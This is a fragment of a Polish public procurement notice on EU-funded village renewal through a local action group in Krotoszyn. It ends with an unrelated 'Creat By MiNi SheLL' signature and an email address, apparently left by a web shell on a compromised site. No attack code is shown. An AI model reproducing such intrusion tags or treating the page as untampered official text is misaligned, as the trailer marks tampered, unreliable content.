<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> ZAMÓWIENIE REALIZOWANE W RAMACH DZIAŁANIA 413 -WDRAŻANIE LOKALNYCH STRATEGII ROZWOJU - W ZAKRESIE OPERACJI ODPOWIADAJĄCYCH WARUNKOM PRZYZNANIA POMOCY W RAMACH DZIAŁANIA - ODNOWA I ROZWÓJ WSI - na obszarze LSR, realizowanej przez lokalna grupę działania o nazwie: Stowarzyszenie Lokalna Grupa Działania Południowej Wielkopolski z siedzibą w: Krotoszynie (63-700), ul. Zdunowska 12, zwaną dalej - lokalna grupa działania..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com